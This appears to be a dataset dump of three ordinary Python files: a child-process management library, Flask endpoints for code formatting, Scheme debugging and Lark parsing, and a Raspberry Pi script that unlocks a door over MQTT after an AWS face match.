source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
__init__.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import next
from builtins import range
from builtins import *
from builtins import object
__author__ = 'matth'
import threading
import traceback
import sys
import subprocess
import time
import uuid
import logging
import json
import argparse
import shlex
import os
import jsonrpc
import queue
import pkgutil
from processfamily.threads import stop_threads
from processfamily.processes import kill_process, process_exists, set_process_affinity, cpu_count
import signal
import functools
if sys.platform.startswith('win'):
import win32job
import win32api
import win32security
import pywintypes
import winerror
from processfamily import win32Popen
else:
from . import ctypes_prctl as prctl
SIGNAL_NAMES = {getattr(signal, k): k for k in dir(signal) if k.startswith("SIG")}
logger = logging.getLogger("processfamily")
class JobObjectAssignError(Exception):
def __init__(self, message, cause, already_in_job):
super(JobObjectAssignError, self).__init__(message)
self.cause = cause
self.already_in_job = already_in_job
def start_child_process(child_process_instance):
host = _ChildProcessHost(child_process_instance)
host.run()
def _traceback_str():
exc_info = sys.exc_info()
return "".join(traceback.format_exception(exc_info[0], exc_info[1], exc_info[2]))
def _exception_str():
exc_info = sys.exc_info()
return "".join(traceback.format_exception_only(exc_info[0], exc_info[1]))
class ChildProcess(object):
"""
Subclass this for the implementation of the child process. You must also include an appropriate main entry point.
You should do something like this in your implementation:
if __name__ == '__main__':
start_child_process(MyChildProcess())
"""
def init(self):
"""
Do any initialisation. The parent will wait for this to be complete before considering the process to be
running.
"""
def run(self):
"""
Method representing the thread's activity. You may override this method in a subclass.
This will be called from the processes main method, after initialising some other stuff.
"""
def stop(self, timeout=None):
"""
Will be called from a new thread. The process should do its best to shutdown cleanly if this is called.
:param timeout The number of milliseconds that the parent process will wait before killing this process.
"""
class _ArgumentParser(argparse.ArgumentParser):
def exit(self, status=0, message=None):
pass
def error(self, message):
raise ValueError(message)
class _ChildProcessHost(object):
def __init__(self, child_process):
self.child_process = child_process
self.command_arg_parser = _ArgumentParser(description='Execute an RPC method on the child')
self.command_arg_parser.add_argument('method')
self.command_arg_parser.add_argument('--id', '-i', dest='json_rpc_id')
self.command_arg_parser.add_argument('--params', '-p', dest='params')
self._started_event = threading.Event()
self._stopped_event = threading.Event()
self.dispatcher = jsonrpc.Dispatcher()
self.dispatcher["stop"] = self._respond_immediately_for_stop
self.dispatcher["wait_for_start"] = self._wait_for_start
self.stdin = sys.stdin
sys.stdin = open(os.devnull, 'r')
self.stdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
self._stdout_lock = threading.RLock()
self._sys_in_thread = threading.Thread(target=self._sys_in_thread_target, name="pf_%s_stdin" % repr(child_process))
self._sys_in_thread.daemon = True
self._should_stop = False
def run(self):
#This is in the main thread
try:
self._sys_in_thread.start()
try:
if self._should_stop:
return
self.child_process.init()
finally:
self._started_event.set()
if self._should_stop:
return
self.child_process.run()
except Exception as e:
logger.error("Error: %s\n%s", e, _traceback_str())
raise
finally:
self._stopped_event.set()
def _wait_for_start(self):
self._started_event.wait()
return 0
def _sys_in_thread_target(self):
should_continue = True
while should_continue:
try:
line = self.stdin.readline()
if not line:
should_continue = False
else:
try:
should_continue = self._handle_command_line(line)
except Exception as e:
logger.error("Error handling processfamily command on input: %s\n%s", e, _traceback_str())
except Exception as e:
logger.error("Exception reading input for processfamily: %s\n%s", e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get in to a tight loop which I want to avoid
time.sleep(5)
self._should_stop = True
self._started_event.wait(1)
stop_thread = threading.Thread(target=self._stop_thread_target, name="pf_%s_stop" % repr(self.child_process))
stop_thread.daemon = True
stop_thread.start()
self._stopped_event.wait(3)
#Give her ten seconds to stop
#This will not actually stop the process from terminating as this is a daemon thread
time.sleep(10)
#Now try and force things
stop_threads()
def _stop_thread_target(self):
try:
self.child_process.stop()
except Exception as e:
logger.error("Error handling processfamily stop command: %s\n%s", e, _traceback_str())
def _respond_immediately_for_stop(self):
logger.info("Received stop instruction from parent process")
self._should_stop = True
return 0
def _send_response(self, rsp):
if rsp:
if '\n' in rsp:
raise ValueError('Invalid response string (new lines are not allowed): "%r"' % rsp)
with self._stdout_lock:
logger.debug("Sending response: %s", rsp)
self.stdout.write("%s\n"%rsp)
self.stdout.flush()
def _handle_command_line(self, line):
try:
line = line.strip()
if not line.startswith('{'):
args = self.command_arg_parser.parse_args(shlex.split(line))
request = {
'jsonrpc': '2.0',
'method': args.method,
}
if args.json_rpc_id:
request['id'] = args.json_rpc_id
if args.params:
request['params'] = args.params
line = json.dumps(request)
else:
request = json.loads(line)
request_id = json.dumps(request.get("id"))
except Exception as e:
logger.error("Error parsing command string: %s\n%s", e, _traceback_str())
self._send_response('{"jsonrpc": "2.0", "error": {"code": -32700, "message": "Parse error"}, "id": null}')
return True
if request.get('method') == 'stop':
#I have to process the stop method in this thread!
#This is a bit lame - but I'm just using this to form a valid response and send it immediately
#
self._dispatch_rpc_call(line, request_id)
return False
else:
#Others should be processed from a new thread:
threading.Thread(target=self._dispatch_rpc_call_thread_target, args=(line, request_id)).start()
return True
def _dispatch_rpc_call(self, line, request_id):
try:
rsp = jsonrpc.JSONRPCResponseManager.handle(line, self.dispatcher)
if rsp is not None:
self._send_response(rsp.json)
except Exception as e:
logger.error("Error handling command string: %s\n%s", e, _traceback_str())
self._send_response('{"jsonrpc": "2.0", "error": {"code": 32603, "message": "Error handling request"}, "id": %s}'%request_id)
def _dispatch_rpc_call_thread_target(self, line, request_id):
try:
self._dispatch_rpc_call(line, request_id)
except Exception as e:
logger.error("Error handling command string: %s\n%s", e, _traceback_str())
class ChildCommsStrategy(object):
"""
A proxy to the child process that can be used from the parent process
"""
MONITOR_STDOUT = True
SENDS_STDOUT_RESPONSES = False
CAN_WAIT_FOR_TERMINATE = True
def __init__(self, process_instance, echo_std_err, child_index, process_family):
if type(self) == ChildCommsStrategy:
raise NotImplementedError("A concrete strategy needs to be chosen")
self.process_family = process_family
self.child_index = child_index
self.name = self.process_family.get_child_name(child_index)
self._process_instance = process_instance
self._rsp_queues_lock = threading.RLock()
self._rsp_queues = {}
self._stdin_lock = threading.RLock()
self.echo_std_err = echo_std_err
if self.echo_std_err:
self._sys_err_thread = threading.Thread(target=self._sys_err_thread_target, name="pf_%s_stderr" % self.name)
self._sys_err_thread.daemon = True
self._sys_err_thread.start()
if self.MONITOR_STDOUT:
self._sys_out_thread = threading.Thread(target=self._sys_out_thread_target, name="pf_%s_stdout" % self.name)
self._sys_out_thread.daemon = True
self._sys_out_thread.start()
def __repr__(self):
return "%s (%s: %r)" % (self.name, type(self).__name__, self._process_instance)
@property
def pid(self):
return self._process_instance.pid
def is_stopped(self):
"""return whether the governed process has stopped"""
return self._process_instance.poll() is not None
@staticmethod
def get_popen_streams(echo_std_err):
"""Returns kwargs for stdin, stdout and stderr to pass to subprocess.Popen"""
PIPE = subprocess.PIPE
streams = {"stdin": PIPE, "stdout": PIPE, "stderr": PIPE}
if not echo_std_err:
streams["stderr"] = open(os.devnull, 'w')
return streams
def monitor_child_startup(self, end_time):
"""generator method to monitor process startup, with the first yield after sending a ping,
the next after receiving a response, and stopping after cleanup"""
yield
yield
def stop_child(self, end_time):
"""generator method to send stop to child, with the first yield after sending the shutdown command,
the next after receiving a response, and stopping after cleanup"""
yield
yield
def _sys_err_thread_target(self):
while True:
try:
line = self._process_instance.stderr.readline()
if not line:
break
try:
self.process_family.handle_sys_err_line(self.child_index, line)
except Exception as e:
logger.error("Error handling %s stderr output: %s\n%s", self.name, e, _traceback_str())
except Exception as e:
logger.error("Exception reading stderr output for %s: %s\n%s", self.name, e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get in to a tight loop which I want to avoid
time.sleep(5)
logger.debug("Subprocess stderr closed")
def _sys_out_thread_target(self):
try:
while True:
try:
line = self._process_instance.stdout.readline()
if not line:
break
try:
if self.SENDS_STDOUT_RESPONSES:
self._handle_response_line(line)
else:
self.process_family.handle_sys_out_line(self.child_index, line)
except Exception as e:
logger.error("Error handling %s stdout output: %s\n%s", self.name, e, _traceback_str())
except Exception as e:
logger.error("Exception reading stdout output for %s: %s\n%s", self.name, e, _traceback_str())
# This is a bit ugly, but I'm not sure what kind of error could cause this exception to occur,
# so it might get in to a tight loop which I want to avoid
time.sleep(5)
logger.debug("Subprocess stdout closed - expecting termination")
start_time = time.time()
while self._process_instance.poll() is None and time.time() - start_time < 5:
time.sleep(0.1)
if self.echo_std_err:
self._sys_err_thread.join(5)
if self._process_instance.poll() is None:
logger.error("Stdout stream closed for %s, but process is not terminated (PID:%s)", self.name, self.pid)
else:
logger.info("%s terminated (return code: %d)", self.name, self._process_instance.returncode)
finally:
#Unstick any waiting command threads:
with self._rsp_queues_lock:
for q in list(self._rsp_queues.values()):
if q.empty():
q.put_nowait(None)
self._rsp_queues = None
def _handle_response_line(self, line):
rsp = json.loads(line)
if "id" in rsp:
with self._rsp_queues_lock:
if self._rsp_queues is None:
return
rsp_queue = self._rsp_queues.get(rsp["id"], None)
if rsp_queue is not None:
rsp_queue.put_nowait(rsp)
#We need to keep the job handle in a global variable so that can't go out of scope and result in our process
#being killed
_global_process_job_handle = None
CPU_AFFINITY_STRATEGY_NONE = 0
CPU_AFFINITY_STRATEGY_CHILDREN_ONLY = 1
CPU_AFFINITY_STRATEGY_PARENT_INCLUDED = 2
class NoCommsStrategy(ChildCommsStrategy):
MONITOR_STDOUT = False
CAN_WAIT_FOR_TERMINATE = False
@staticmethod
def get_popen_streams(echo_std_err):
"""Returns kwargs for stdin, stdout and stderr to pass to subprocess.Popen"""
return {"stdin": None, "stdout": None, "stderr": None}
class ClosePipesCommsStrategy(ChildCommsStrategy):
def stop_child(self, end_time):
p = self._process_instance
logger.info("Closing stdin for process %r", self)
try:
p.stdin.close()
except Exception as e:
logger.warning("Failed to close child process input stream with PID %s: %s\n%s", self.pid, e, _traceback_str())
yield
yield
class ProcessFamilyRPCProtocolStrategy(ChildCommsStrategy):
SENDS_STDOUT_RESPONSES = True
def monitor_child_startup(self, end_time):
"""generator method to monitor process startup, with the first yield after sending a ping,
the next after receiving a response, and stopping after cleanup"""
response_id = str(uuid.uuid4())
try:
yield self._send_command_req(response_id, "wait_for_start")
response = self._wait_for_response(response_id, end_time - time.time())
yield response
finally:
self._cleanup_queue(response_id)
if response is None:
poll_result = self._process_instance.poll()
if poll_result is None:
logger.error("Timed out waiting for %s (PID %d) to complete initialisation",
self.name, self.pid)
else:
logger.error("%s terminated with response code %d before completing initialisation",
self.name, poll_result)
def stop_child(self, end_time):
"""generator method to send stop to child, with the first yield after sending the shutdown command,
the next after receiving a response, and stopping after cleanup"""
response_id = str(uuid.uuid4())
try:
yield self._send_command_req(response_id, "stop")
yield self._wait_for_response(response_id, end_time - time.time())
finally:
self._cleanup_queue(response_id)
def _send_command_req(self, response_id, command, params=None):
with self._rsp_queues_lock:
if self._rsp_queues is None:
return
self._rsp_queues[response_id] = queue.Queue()
cmd = {
"method": command,
"id": response_id,
"jsonrpc": "2.0"
}
if params is not None:
cmd["params"] = params
req = json.dumps(cmd)
if '\n' in req:
raise ValueError('Invalid request string (new lines are not allowed): "%r"' % req)
try:
with self._stdin_lock:
self._process_instance.stdin.write(("%s\n" % req).encode('utf8'))
self._process_instance.stdin.flush()
if command == 'stop':
#Now close the stream - we are done
self._process_instance.stdin.close()
except Exception as e:
if self._process_instance.poll() is None:
#The process is running, so something is wrong:
raise
def _wait_for_response(self, response_id, timeout):
with self._rsp_queues_lock:
if self._rsp_queues is None:
return None
q = self._rsp_queues.get(response_id, None)
if q is None:
return None
try:
if timeout <= 0:
return q.get_nowait()
else:
return q.get(True, timeout)
except queue.Empty as e:
return None
def _cleanup_queue(self, response_id):
with self._rsp_queues_lock:
if self._rsp_queues is not None:
self._rsp_queues.pop(response_id, None)
class SignalStrategy(ChildCommsStrategy):
def stop_child(self, end_time):
"""generator method to send stop to child, with the first yield after sending the shutdown command,
the next after receiving a response, and stopping after cleanup"""
signum = self.process_family.CHILD_STOP_SIGNAL
signal_name = SIGNAL_NAMES.get(signum, str(signum))
logger.info("Sending signal %s to process %r", signal_name, self)
os.kill(self.pid, signum)
yield
yield
class ForkingChildSignalStrategy(SignalStrategy):
# requires the process_family instance to have a pid_file attribute added...
MONITOR_STDOUT = False
@property
def pid(self):
return getattr(self, "forked_pid", None) or self._process_instance.pid
def is_stopped(self):
return not process_exists(self.pid)
def monitor_child_startup(self, end_time):
"""generator method to monitor process startup, with the first yield after sending a ping,
the next after receiving a response, and stopping after cleanup"""
while (self._process_instance.poll() is None) and time.time() < end_time:
# Python 2.7 has the timeout parameter for wait, but it is not documented
# try:
# subprocess.Popen().wait(end_time - time.time())
# except Exception, e:
# pass
time.sleep(0.05)
yield
if os.path.exists(self.process_family.pid_file):
with open(self.process_family.pid_file, 'rb') as f:
pid_str = f.read().strip()
self.forked_pid = int(pid_str) if pid_str and pid_str.isdigit() else None
if not self.forked_pid:
logger.error("Unexpected pid found in file %s for %r: %r", self.process_family.pid_file, self, pid_str)
yield
else:
self.forked_pid = None
logger.error("PID file %s was not created: Child for %r probably failed to start", self.process_family.pid_file, self)
raise ValueError("Could not find child process for %s (probably failed to start)" % self.name)
CHILD_COMMS_STRATEGY_NONE = NoCommsStrategy
CHILD_COMMS_STRATEGY_PIPES_CLOSE = ClosePipesCommsStrategy
CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL = ProcessFamilyRPCProtocolStrategy
CHILD_COMMS_STRATEGY_SIGNAL = SignalStrategy
class ProcessFamily(object):
"""
Manages the launching of a set of child processes
"""
ECHO_STD_ERR = False
CPU_AFFINITY_STRATEGY = CPU_AFFINITY_STRATEGY_PARENT_INCLUDED
CLOSE_FDS = True
CHILD_STOP_SIGNAL = signal.SIGINT
WIN_PASS_HANDLES_OVER_COMMANDLINE = False
WIN_USE_JOB_OBJECT = True
LINUX_USE_PDEATHSIG = True
NEW_PROCESS_GROUP = True
CHILD_COMMS_STRATEGY = CHILD_COMMS_STRATEGY_PROCESSFAMILY_RPC_PROTOCOL
def __init__(self, child_process_module_name=None, number_of_child_processes=None, run_as_script=True):
self.child_process_module_name = child_process_module_name
self.run_as_script = run_as_script
self.cpu_count = cpu_count()
if number_of_child_processes:
self.number_of_child_processes = number_of_child_processes
else:
if self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED:
self.number_of_child_processes = self.cpu_count-1
elif self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_CHILDREN_ONLY:
self.number_of_child_processes = self.cpu_count
else:
self.number_of_child_processes = self.cpu_count
self.child_processes = []
self._child_process_group_id = None
def get_child_process_cmd(self, child_number):
"""
:param child_number zero-indexed
"""
if self.run_as_script:
return [self.get_sys_executable(), self._find_module_filename(self.child_process_module_name)]
else:
return [self.get_sys_executable(), '-m', self.child_process_module_name]
def get_sys_executable(self):
return sys.executable
def get_job_object_name(self):
return "py_processfamily_%s" % (str(uuid.uuid4()))
def get_child_name(self, i):
return 'Child Process %d' % (i+1)
def handle_sys_err_line(self, child_index, line):
sys.stderr.write(line)
def handle_sys_out_line(self, child_index, line):
"""
This is only relevant if CHILD_COMMS_STRATEGY_PIPES_CLOSE is used
"""
pass
def _add_to_job_object(self):
global _global_process_job_handle
if _global_process_job_handle is not None:
#This means that we are creating another process family - we'll all be in the same job
return
already_in_job = win32job.IsProcessInJob(win32api.GetCurrentProcess(), None)
#Create a new job and put us in it before we create any children
logger.debug("Creating job object and adding parent process to it")
security_attrs = win32security.SECURITY_ATTRIBUTES()
security_attrs.bInheritHandle = 0
_global_process_job_handle = win32job.CreateJobObject(security_attrs, self.get_job_object_name())
extended_info = win32job.QueryInformationJobObject(_global_process_job_handle, win32job.JobObjectExtendedLimitInformation)
extended_info['BasicLimitInformation']['LimitFlags'] = win32job.JOB_OBJECT_LIMIT_KILL_ON_JOB_CLOSE
win32job.SetInformationJobObject(_global_process_job_handle, win32job.JobObjectExtendedLimitInformation, extended_info)
try:
win32job.AssignProcessToJobObject(_global_process_job_handle, win32api.GetCurrentProcess())
except Exception as e:
winv = sys.getwindowsversion()
logger.error("Error raised during assignment of the current process to a new job object. " +\
"The process %s already in a job. " +\
"The windows version is %d.%d.\nError: %s",
"is" if already_in_job else "is not",
winv.major,
winv.minor,
_exception_str())
if already_in_job and not (winv.major >= 6 and winv.minor >= 2):
raise JobObjectAssignError("On Windows versions older than Windows 8 / Windows Server 2012, ProcessFamily relies on the parent process NOT being in a job already", e, already_in_job)
raise JobObjectAssignError("Error raised during assignment of the current process to a new job object.", e, already_in_job)
logger.debug("Added to job object")
def get_Popen_kwargs(self, i, **kwargs):
popen_streams = self.CHILD_COMMS_STRATEGY.get_popen_streams(self.ECHO_STD_ERR)
kwargs.update(popen_streams)
if sys.platform.startswith('win'):
if self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
kwargs['timeout_for_child_stream_duplication_event'] = None
if self.NEW_PROCESS_GROUP:
kwargs['creationflags'] = subprocess.CREATE_NEW_PROCESS_GROUP
return kwargs
else:
kwargs['preexec_fn'] = functools.partial(self.pre_exec_fn, i)
return kwargs
def get_Popen_class(self):
if sys.platform.startswith('win'):
if self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
logger.debug("Using HandlesOverCommandLinePopen")
return win32Popen.HandlesOverCommandLinePopen
else:
logger.debug("Using ProcThreadAttributeHandleListPopen")
return win32Popen.ProcThreadAttributeHandleListPopen
else:
return subprocess.Popen
def pre_exec_fn(self, i):
#This is called after fork(), but before exec()
#Assign this new process to a new group
if self.NEW_PROCESS_GROUP:
os.setpgrp()
if self.LINUX_USE_PDEATHSIG:
prctl.set_pdeathsig(self.get_pdeath_sig())
def get_pdeath_sig(self):
return signal.SIGKILL
def set_parent_affinity_mask(self):
if self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED:
set_process_affinity({0})
def set_child_affinity_mask(self, pid, child_index):
i = child_index+1 if self.CPU_AFFINITY_STRATEGY == CPU_AFFINITY_STRATEGY_PARENT_INCLUDED else child_index
set_process_affinity({i%self.cpu_count}, pid=pid)
def start(self, timeout=30):
if self.child_processes:
raise Exception("Invalid state: start() can only be called once")
s = time.time()
if self.CPU_AFFINITY_STRATEGY:
self.set_parent_affinity_mask()
if sys.platform.startswith('win') and self.WIN_USE_JOB_OBJECT:
self._add_to_job_object()
self.child_processes = []
for i in range(self.number_of_child_processes):
logger.info("Starting %s", self.get_child_name(i))
cmd = self.get_child_process_cmd(i)
logger.debug("Commandline for %s: %s", self.get_child_name(i), json.dumps(cmd))
p = self.get_Popen_class()(cmd, **self.get_Popen_kwargs(i, close_fds=self.CLOSE_FDS))
if self.CPU_AFFINITY_STRATEGY and p.poll() is None:
try:
self.set_child_affinity_mask(p.pid, i)
except Exception as e:
logger.error("Unable to set affinity for %s process %d: %s", self.get_child_name(i), p.pid, e)
self.child_processes.append(self.CHILD_COMMS_STRATEGY(p, self.ECHO_STD_ERR, i, self))
if sys.platform.startswith('win') and self.WIN_PASS_HANDLES_OVER_COMMANDLINE:
logger.debug("Waiting for child stream duplication events")
for c in self.child_processes:
c._process_instance.wait_for_child_stream_duplication_event(timeout=timeout-(time.time()-s)-3)
self.wait_for_start(timeout - (time.time()-s))
logger.info("All child processes initialised with strategy %s", self.CHILD_COMMS_STRATEGY.__name__)
def wait_for_start(self, timeout):
"""Waits (a maximum of timeout) until all children of process_family have started"""
end_time = time.time() + timeout
command_processes = []
try:
for child_process in self.child_processes:
command_processes.append(child_process.monitor_child_startup(end_time))
for c in command_processes:
# ping the process
next(c)
# results
return [next(c) for c in command_processes]
finally:
for c in command_processes:
c.close()
def stop(self, timeout=30, wait=True):
"""Stops children. Returns the number that required termination (or None if wait=False)"""
clean_timeout = timeout - 1
start_time = time.time()
self.send_stop(clean_timeout)
if wait:
remaining_time = timeout - (time.time() - start_time)
return self.wait_for_stop_and_then_terminate(timeout=remaining_time)
def send_stop(self, timeout):
"""Instructs all process_family children to stop"""
end_time = time.time() + timeout
command_processes = []
try:
for child_process in self.child_processes:
if not child_process.is_stopped():
command_processes.append(child_process.stop_child(end_time))
for c in command_processes:
# ping the process
next(c)
# results
return [next(c) for c in command_processes]
finally:
for c in command_processes:
c.close()
def wait_for_stop_and_then_terminate(self, timeout=30):
"""Waits for children to stop, but terminates them if necessary. Returns the number terminated"""
clean_timeout = timeout - 1
start_time = time.time()
if self.CHILD_COMMS_STRATEGY.CAN_WAIT_FOR_TERMINATE:
logger.debug("Waiting for child processes to terminate")
self._wait_for_children_to_terminate(start_time, clean_timeout)
num_terminated = 0
if self.child_processes:
#We've nearly run out of time - let's try and kill them:
logger.info("Attempting to kill child processes")
for p in list(self.child_processes):
try:
num_terminated += 1
if process_exists(p.pid):
kill_process(p.pid)
except Exception as e:
logger.warning("Failed to kill child process %s with PID %s: %s\n%s", p.name, p.pid, e, _traceback_str())
self._wait_for_children_to_terminate(start_time, timeout)
return num_terminated
def _wait_for_children_to_terminate(self, start_time, timeout):
first_run = True
while self.child_processes and (first_run or time.time() - start_time < timeout):
for p in list(self.child_processes):
if p.is_stopped():
self.child_processes.remove(p)
if first_run:
first_run = False
else:
time.sleep(0.1)
def _find_module_filename(self, modulename):
"""finds the filename of the module with the given name (supports submodules)"""
loader = pkgutil.find_loader(modulename)
if loader is None:
raise ImportError(modulename)
search_path = loader.get_filename(modulename)
return search_path
|
language_apis.py
|
import re
from json import dumps
from multiprocessing import Process, Queue
import black
import requests
from flask import jsonify, request
from lark import Lark, LarkError, Token, Tree, UnexpectedEOF
from IGNORE_scheme_debug import (
Buffer,
SchemeError,
debug_eval,
scheme_read,
tokenize_lines,
)
from formatter import scm_reformat
def create_language_apis(app):
# python
@app.route("/api/pytutor", methods=["POST"])
def pytutor_proxy():
data = {
"user_script": request.form["code"],
# "options_json": r'{"cumulative_mode":true,"heap_primitives":false}',
}
if "options_json" in request.form:
data["options_json"] = request.form["options_json"]
response = requests.post(
"http://pythontutor.com/web_exec_py3.py",
data=data,
)
return response.text
@app.route("/api/black", methods=["POST"])
def black_proxy():
try:
return jsonify(
{
"success": True,
"code": black.format_str(
request.form["code"], mode=black.FileMode()
)
+ "\n",
}
)
except Exception as e:
return jsonify({"success": False, "error": repr(e)})
# scheme
@app.route("/api/scm_debug", methods=["POST"])
def scm_debug():
code = request.form["code"]
q = Queue()
p = Process(target=scm_worker, args=(code, q))
p.start()
p.join(10)
if not q.empty():
return jsonify(q.get())
@app.route("/api/scm_format", methods=["POST"])
def scm_format():
try:
return jsonify(
{"success": True, "code": scm_reformat(request.form["code"])}
)
except Exception as e:
return jsonify({"success": False, "error": repr(e)})
@app.route("/api/lark_run", methods=["POST"])
def lark_run():
grammar = request.form["grammar"]
import_regex = r"%import common\.([a-zA-Z]*)"
imports = [match.group(1) for match in re.finditer(import_regex, grammar)]
grammar = re.sub(r"%import common\.[a-zA-Z]*", "", grammar)
if "%import" in grammar:
return jsonify(dict(error="Arbitrary %imports are not supported"))
for terminal in imports:
grammar += f"""
%import common.{terminal}
"""
text = request.form.get("text", None)
try:
parser = Lark(grammar, start="start")
except LarkError as e:
return jsonify(dict(error=str(e)))
if text is None:
return jsonify(dict(success=True))
try:
parse_tree = parser.parse(text)
except UnexpectedEOF as e:
return jsonify(
dict(
error=str(e)
+ "[Hint: use the .begin and .end commands to input multiline strings]\n"
)
)
except LarkError as e:
return jsonify(dict(error=str(e)))
def export(node):
if isinstance(node, Tree):
return [
node.data,
[export(child) for child in node.children],
]
elif isinstance(node, Token):
return [repr(node.value)]
else:
return [repr(node)]
return jsonify(
success=True, parsed=export(parse_tree), repr=parse_tree.pretty()
)
def scm_worker(code, queue):
try:
buff = Buffer(tokenize_lines(code.split("\n")))
exprs = []
while buff.current():
exprs.append(scheme_read(buff))
out = debug_eval(exprs)
except (SyntaxError, SchemeError) as err:
queue.put(dumps(dict(error=str(err))))
except:
queue.put(dumps(dict(error="An internal error occurred.")))
raise
else:
queue.put(out)
|
Matrix.py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Aug 24 12:26:19 2019
@author: VAI
"""
import paho.mqtt.client as mqtt
import json
import boto3
import cv2
## Set Initial Variables ##
import os # Miscellaneous operating system interface
import zmq # Asynchronous messaging framework
import time # Time access and conversions
from random import randint # Random numbers
import sys # System-specific parameters and functions
# Handy function for connecting to the Error port
from utils import register_error_callback
from matrix_io.proto.malos.v1 import driver_pb2 # MATRIX Protocol Buffer driver library
from matrix_io.proto.malos.v1 import io_pb2 # MATRIX Protocol Buffer sensor library
from multiprocessing import Process, Manager, Value # Allow for multiple processes at once
from zmq.eventloop import ioloop, zmqstream# Asynchronous events through ZMQ
matrix_ip = '127.0.0.1' # Local device ip
everloop_port = 20021 # Driver Base port
led_count = 0 # Amount of LEDs on MATRIX device
flag=False
Color=""
def compare_faces(sourceFile, targetFile):
client=boto3.client('rekognition')
imageSource=open(sourceFile,'rb')
imageTarget=open(targetFile,'rb')
response=None
response=client.compare_faces(SimilarityThreshold=80,
SourceImage={'Bytes': imageSource.read()},
TargetImage={'Bytes': imageTarget.read()})
for faceMatch in response['FaceMatches']:
position = faceMatch['Face']['BoundingBox']
similarity = str(faceMatch['Similarity'])
print('The face at ' +
str(position['Left']) + ' ' +
str(position['Top']) +
' matches with ' + similarity + '% confidence')
imageSource.close()
imageTarget.close()
return len(response['FaceMatches'])
def on_connect(client, userdata, flags, rc):
print("rc: " + str(rc))
def on_message(client, obj, msg):
global flag
global Color
topic=msg.topic
if(topic=="esp/test"):
print("ESP Online")
else:
y = json.loads(msg.payload.decode())
print(y["intent"]["intentName"])
print(y["slots"][0]["value"]["value"])
lock=y["slots"][0]["value"]["value"]
flag=True
if(lock=="open" or lock=="unlock"):
cap = cv2.VideoCapture(0)
ret, frame = cap.read()
cv2.imwrite( "image.jpg", frame );
target_file='image.jpg'
source_file='myface.jpg'
face_matches=compare_faces(source_file, target_file)
if(face_matches>0):
print("Yes my lord")
Color="green"
else:
Color="red"
else:
Color="none"
def on_publish(client, obj, mid):
print("mid: " + str(mid))
def on_subscribe(client, obj, mid, granted_qos):
print("Subscribed: " + str(mid) + " " + str(granted_qos))
def on_log(client, obj, level, string):
#print(string)
...
def ping_socket():
# Define zmq socket
context = zmq.Context()
# Create a Pusher socket
ping_socket = context.socket(zmq.PUSH)
# Connect to the socket
ping_socket.connect('tcp://{0}:{1}'.format(matrix_ip, everloop_port+1))
# Ping with empty string to let the drive know we're still listening
ping_socket.send_string('')
def everloop_error_callback(error):
# Log error
print('{0}'.format(error))
## DATA UPDATE PORT ##
def update_socket():
# Define zmq socket
context = zmq.Context()
# Create a Subscriber socket
socket = context.socket(zmq.SUB)
# Connect to the Data Update port
socket.connect('tcp://{0}:{1}'.format(matrix_ip, everloop_port+3))
# Connect Subscriber to Error port
socket.setsockopt(zmq.SUBSCRIBE, b'')
# Create the stream to listen to data from port
stream = zmqstream.ZMQStream(socket)
# Function to update LED count and close connection to the Data Update Port
def updateLedCount(data):
# Extract data and pass into led_count global variable
global led_count
led_count = io_pb2.LedValue().FromString(data[0]).green
# Log LEDs
print('{0} LEDs counted'.format(led_count))
# If LED count obtained
if led_count > 0:
# Close Data Update Port connection
ioloop.IOLoop.instance().stop()
print('LED count obtained. Disconnecting from data publisher {0}'.format(everloop_port+3))
# Call updateLedCount() once data is received
stream.on_recv(updateLedCount)
# Log and begin event loop for ZMQ connection to Data Update Port
print('Connected to data publisher with port {0}'.format(everloop_port+3))
ioloop.IOLoop.instance().start()
## BASE PORT ##
def config_socket(ledCount):
global flag
global Color
# Define zmq socket
context = zmq.Context()
# Create a Pusher socket
socket = context.socket(zmq.PUSH)
# Connect Pusher to configuration socket
socket.connect('tcp://{0}:{1}'.format(matrix_ip, everloop_port))
rc = 0
driver_config_proto = driver_pb2.DriverConfig()
# Create an empty Everloop image
image = []
# For each device LED
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 10
ledValue.red = 10
ledValue.green = 10
ledValue.white = 0
image.append(ledValue)
# Store the Everloop image in driver configuration
driver_config_proto.image.led.extend(image)
# Send driver configuration through ZMQ socket
socket.send(driver_config_proto.SerializeToString())
client = mqtt.Client()
client.connect("raspberrypi.local", 1883)
client.subscribe("hermes/nlu/intentParsed")
client.subscribe("esp/test")
client.on_message = on_message
client.on_connect = on_connect
client.on_publish = on_publish
client.on_subscribe = on_subscribe
client.on_log = on_log
while rc == 0:
rc = client.loop()
if(flag):
# Create a new driver config
driver_config_proto = driver_pb2.DriverConfig()
# Create an empty Everloop image
image = []
# For each device LED
if(Color=="red"):
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 0
ledValue.red = 100
ledValue.green = 0
ledValue.white = 0
image.append(ledValue)
elif(Color=="blue"):
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 100
ledValue.red = 0
ledValue.green = 0
ledValue.white = 0
image.append(ledValue)
elif(Color=="green"):
client.publish("esp/lock", "Hello")
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 0
ledValue.red = 0
ledValue.green = 100
ledValue.white = 0
image.append(ledValue)
else:
for led in range(ledCount):
# Set individual LED value
ledValue = io_pb2.LedValue()
ledValue.blue = 10
ledValue.red = 10
ledValue.green = 10
ledValue.white = 0
image.append(ledValue)
# Store the Everloop image in driver configuration
driver_config_proto.image.led.extend(image)
# Send driver configuration through ZMQ socket
socket.send(driver_config_proto.SerializeToString())
#Wait before restarting loop
time.sleep(10)
